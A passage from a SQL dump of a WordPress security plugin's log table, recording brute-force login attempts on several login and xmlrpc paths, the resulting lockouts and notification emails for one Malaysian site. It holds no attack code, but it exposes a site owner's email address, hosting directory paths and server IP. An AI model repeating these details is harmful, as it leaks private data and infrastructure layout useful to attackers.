10:43:09',17801104,19286528,'https://bintara.com.my/wp/wp-login.php',1,0,'128.199.175.6'),(25278,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:43:07\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:43:07\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:58:07\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:58:07\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:43:08','2019-09-21 10:43:07',17887936,19289672,'https://bintara.com.my/test/wp-login.php',1,0,'13.76.155.243'),(25279,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:43:08','2019-09-21 10:43:07',18094208,19289672,'https://bintara.com.my/test/wp-login.php',1,0,'13.76.155.243'),(25280,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@vHkXpgmG5P@iB8kKVAAAAJA\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"13.76.155.243\";s:11:\"REMOTE_PORT\";s:5:\"52170\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@vHkXpgmG5P@iB8kKVAAAAJA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062588.7623\";s:12:\"REQUEST_TIME\";s:10:\"1569062588\";}}','notice','2019-09-21 10:43:10','2019-09-21 10:43:09',18314440,19613328,'https://bintara.com.my/test/xmlrpc.php',1,0,'13.76.155.243'),(25275,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:42:25\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:42:25\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:57:25\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:57:25\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:42:26','2019-09-21 10:42:25',17887216,19289000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'192.169.249.36'),(25276,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:42:26','2019-09-21 10:42:25',18092912,19289000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'192.169.249.36'),(25277,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@uliJ7D9Gn7wDPh8T0wAAAME\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"13.76.155.243\";s:11:\"REMOTE_PORT\";s:5:\"51820\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@uliJ7D9Gn7wDPh8T0wAAAME\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062587.0383\";s:12:\"REQUEST_TIME\";s:10:\"1569062587\";}}','notice','2019-09-21 10:43:08','2019-09-21 10:43:07',17803256,19289672,'https://bintara.com.my/test/wp-login.php',1,0,'13.76.155.243'),(25272,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:41:38\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:41:38\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:56:38\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:56:38\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:41:39','2019-09-21 10:41:38',17881640,19289904,'https://bintara.com.my/wp/wp-login.php',1,0,'132.148.141.147'),(25273,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:41:39','2019-09-21 10:41:38',18087680,19289904,'https://bintara.com.my/wp/wp-login.php',1,0,'132.148.141.147'),(25274,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@kDDrcQxTmGrCWuaIEwAAAcc\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"192.169.249.36\";s:11:\"REMOTE_PORT\";s:5:\"44006\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@kDDrcQxTmGrCWuaIEwAAAcc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062544.6475\";s:12:\"REQUEST_TIME\";s:10:\"1569062544\";}}','notice','2019-09-21 10:42:26','2019-09-21 10:42:25',17803048,19289000,'https://bintara.com.my/wordpress/wp-login.php',1,0,'192.169.249.36'),(25270,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:41:29','2019-09-21 10:41:28',18094952,19290664,'https://bintara.com.my/blog/wp-login.php',1,0,'198.72.112.193'),(25271,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@YjDrcQxTmGrCWuaIDgAAAco\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"132.148.141.147\";s:11:\"REMOTE_PORT\";s:5:\"37654\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@YjDrcQxTmGrCWuaIDgAAAco\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569062498.4045\";s:12:\"REQUEST_TIME\";s:10:\"1569062498\";}}','notice','2019-09-21 10:41:39','2019-09-21 10:41:38',17797808,19289904,'https://bintara.com.my/wp/wp-login.php',1,0,'132.148.141.147'),(25269,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:41:28\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:41:28\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:56:28\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:56:28\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:41:29','2019-09-21 10:41:28',17888840,19290664,'https://bintara.com.my/blog/wp-login.php',1,0,'198.72.112.193'),(25266,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:41:01\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:41:01\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:56:01\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:56:01\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:41:02','2019-09-21 10:41:01',17888912,19290400,'https://bintara.com.my/2019/wp-login.php',1,0,'173.249.49.134'),(25267,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:41:02','2019-09-21 10:41:01',18095008,19290400,'https://bintara.com.my/2019/wp-login.php',1,0,'173.249.49.134'),(25268,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@WHkXpgmG5P@iB8kKGAAAAIM\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"198.72.112.193\";s:11:\"REMOTE_PORT\";s:5:\"42466\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYX@WHkXpgmG5P@iB8kKGAAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569062488.311\";s:12:\"REQUEST_TIME\";s:10:\"1569062488\";}}','notice','2019-09-21 10:41:29','2019-09-21 10:41:28',17804120,19290664,'https://bintara.com.my/blog/wp-login.php',1,0,'198.72.112.193'),(25263,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 18:40:39\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 10:40:39\";s:14:\"lockout_expire\";s:19:\"2019-09-21 18:55:39\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 10:55:39\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 10:40:40','2019-09-21 10:40:39',17882544,19288440,'https://bintara.com.my/wordpress/wp-login.php',1,0,'142.93.99.56'),(25264,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 10:40:40','2019-09-21 10:40:39',18088200,19288440,'https://bintara.com.my/wordpress/wp-login.php',1,0,'142.93.99.56'),(25265,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYX@PHkXpgmG5P@iB8kJ8wAAAIg\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"173.249.49.134\";s:11:\"REMOTE_PORT\";s:5:\"51512\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.co